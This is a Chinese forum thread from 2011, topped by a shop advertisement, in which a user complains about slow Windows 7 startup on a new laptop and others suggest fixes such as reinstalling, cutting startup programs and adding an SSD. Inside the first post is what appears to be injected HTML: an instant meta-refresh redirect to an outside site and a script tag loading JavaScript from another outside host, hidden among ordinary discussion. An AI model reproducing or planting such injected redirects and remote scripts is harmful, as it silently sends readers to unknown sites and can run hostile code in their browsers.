开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

进系统好慢啊

在黑色windows Logo界面要闪烁10次左右
在win7蓝色欢迎界面
出现欢迎两个字 要转53圈才进系统,还一卡一卡的
360提示1分40秒,超过8%的电脑....

我旧的本本进win7才40秒
5年前的本进XP40多秒

很不爽很不爽,不知道为什么这么慢

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

重装系统
重装系统
看看有多少开机启动程序,多少进程,能关就关
驱动按最精简的来,联想一堆没用的可以放弃
乱七八糟的软件少装,什么大师,估计这个软件就拖后腿了几秒
进入系统设置,选全内存全cpu启动,减少不必要的服务
换ssd
--
基本上20秒以内
重装系统不行或者无法重新装系统的,估计就是硬盘坏了
肯定是装的某些软件有问题.
LZ先看启动后什么程序都不打开时的进程数量吧,估计少不了,呵呵。。。
同感啊。。。
比我的快啊。。
难道是杀毒软件安多了。
wxl7128 发表于 2011-9-12 07:18
难道是杀毒软件安多了。

杀毒之装个360,,,,,之前不知道怎么回事

用了两天突然就变好了

软件只增没减,启动项也没去改

可能新机子要热身吧....什么都没变化,启动39秒了

不过发现联想的一大堆东西确实不少,,很多都是快捷键的服务,又不忍心去关,毕竟快捷键用着还是挺方便的
soul4085 发表于 2011-9-12 09:32
不过发现联想的一大堆东西确实不少,,很多都是快捷键的服务,又不忍心去关,毕竟快捷键用着还是挺方便的 ...

之前软件只装了3个版本VS
Sql2008
4个浏览器
QQ,飞信之类的
杀毒只装了个360一套

有时软件有冲突,如金山和瑞星一起装就会很慢
楼主是不是新系统,需要安装系统补丁导致的啊,补丁安装完成了,速度自然快多了
stefan0809 发表于 2011-9-12 19:10
楼主是不是新系统,需要安装系统补丁导致的啊,补丁安装完成了,速度自然快多了 ...

应该不会,,你看我发帖那天折腾到夜里3点,重启不知道N多少回,装补丁,再怎么也不需要重启那么多次

而且中秋放假第2天,还没这么快,还是一分20秒以上
中秋放假第三天,没做任何变动...竟然启动快了

早晨启动是49秒

然后中间重启一次就是39秒

刚才重启一次42秒

基本上算正常了
Win7开机时间还是不稳定啊
别看那些乱七八糟的东西了。。。
soul4085 发表于 2011-9-12 19:42
应该不会,,你看我发帖那天折腾到夜里3点,重启不知道N多少回,装补丁,再怎么也不需要重启那么多次

而且中 ...

这个其实很好解释呀,因为系统启动加载的东西不同,有的时候做了程序升级什么的,下次启动必然比没升级的时候慢一下。
使了几天,未作任何优化,,开始机时间又降了,降到34秒,,,,,

神奇了